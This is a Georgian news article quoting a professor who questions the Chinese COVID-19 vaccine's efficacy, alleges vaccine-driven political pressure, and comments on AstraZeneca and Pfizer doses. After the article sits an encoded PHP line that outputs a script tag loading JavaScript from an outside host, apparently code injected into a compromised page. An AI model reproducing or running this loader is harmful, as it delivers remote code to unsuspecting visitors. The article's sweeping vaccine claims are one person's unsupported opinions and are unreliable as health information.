celsiusi
ავერსი შნაიდერი
გაეროს გენერალური მდივნის მრჩევლის, პროფესორი გიორგი ფხაკაძის თქმით,  თავად ჩინეთიც აღიარებს, რომ მისი ვაქცინის ეფექტურობა მხოლოდ 50%-ია.
 
“ჩემს გვერდზე დავდე კვლევები, რომლის თანახმადაც სხვადასხვა ქვეყანაში ჩინურ ვაქცინის ეფექტურობა მერყეობს 50%-დან 83.5%-მდე. ასეთი დიდი ცდომილების მეცნიერული ახსნა არ არსებობს, ეს უკვე მეტყველებს, რომ რაღაც რიგზე ვერ არის. მსოფლიოში ვაქცინების ომია. დიდი დიქტატორული სახელმწიფოები მთელი რიგი ქვეყნების მიმართ საკუთარი ვაქცინების პოპულარიზაციის გზით პოლიტიკურ, კორუფციულ და ეკონომიკურ წნეხს ახორციელებენ. ქვეყნებში, სადაც არის რუსული გავლენა, შეტანილია რუსული ვაქცინები, სადაც ჩინეთს აქვს გავლენა - იქ შეიტანეს ჩინური ვაქცინები. საქართველოში ჩინური ინვესტიციების და ბიზნესის გავლენა დიდია, მარტივი და გასაგებია ყველაფერი”, - განმარტავს ფხაკაძე. 
 
მისივე თქმით, გასათვალისწინებელია, რომ არც ერთმა დამოუკიდებელმა ექსპერტმა არ დადო დამოუკიდებელი დასკვნა ჩინურ ვაქცინაზე.
 
“იმედია, ჩვენი ქვეყანა ბოლომდე შეინარჩუნებს პოზიციას, რომ ვაქცინაცია არის ნებაყოფლობითი და თქვენ, მოქალაქეები, შეძლებთ სწორი გადაწყვეტილების მიღებას, რა უნდა გააკეთოთ”, - აღნიშნავს ფხაკაძე. 
 
გირგი ფხაკაძის თქმით, ახლა ზოგიერთები საქართველოში ჩინური ვაქცინის პროპაგანდას ეწევიან. იმიტომ, რომ ეს ვაქცინა სახელმწიფომ ჩამოიტანა და ვინც სახელმწიფო სტრუქტურებთან და ხელისუფლებასთან კავშირშია უკეთებს რეკლამას ვაქცინას, 
 
“მარტივი ლუსტრაციაა, ჩანს, ვინ ვინ არის. სამწუხაროა, რომ ზოგიერთი ჩემი კოლეგა გახდა პოლიტიკური თამაშის ნაწილი. პოლიტიკაში ყველაფერი დროებითია, გამოიყენებენ ამ ადამიანებს და მოისვრიან. არ ღირს, მეგობრებო, დამიჯერეთ. ხალხი ყველაფერს იმახსოვრებს, არ გინდათ. ვისაც გჯერათ, ჩინური ვაქცინის ეფექტურობა, კი, ბატონო, გაიკეთეთ, ღმერთმა შეგარგოთ, იქნებ პლაცებოს ეფექტმა მაინც იმუშაოს”, - აცხადებს ფხაკაძე. 
 
გიორგი ფხაკაძე “ასტრაზენეკას” ვაქცინაზეც საუბრობს და განმარტავს, რომ ამ ვაქცინაზე ადრეც ბევრი უსაუბრია თუმცა, მათ ვინც უკვე გაიკეთა პირველი დოზა, აფრთხილებს, რომ მეორე დოზაც აუცილებლად უნდა გაიკეთონ. 
 
ფხაკაძის განმარტებით, მსოფლიოში კორონავირუსის უამრავი შტამია გავრცელებული, რომლებზეც ვაქცინების უდიდესი უმრავლესობა არაეფექტურია, ეს ვაქცინები ე.წ. უხანის ვირუსის საწინააღმდეგოა, ეს ვირუსი კი უკვე მილევადია.
 
“კარგი ამბავი არის ის, რომ ვაქცინები, რომლებიც რნმ ტექნოლოგიითაა დამზადებული (მაგალითად, ფაიზერი), იოლად შეიძლება, გადაეწყონ ახალი შტამების წინააღმდეგ და უკვე დაიწყო ამ მიმართულებით პირველი კვლევები; კიდევ ერთი რამ მინდა შეგახსენოთ - მაგალითად, ფაიზერით ვაქცინაციის შემთხვევაში ვაქცინის მესამე დოზაც აუცილებლად იქნება გასაკეთებელი, ვაქცინაციიდან 5-6 თვის შემდეგ. ამაზე ვინმე ლაპარაკობს საქართველოში?!”, - აცხადებს ფხაკაძე.
2957
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");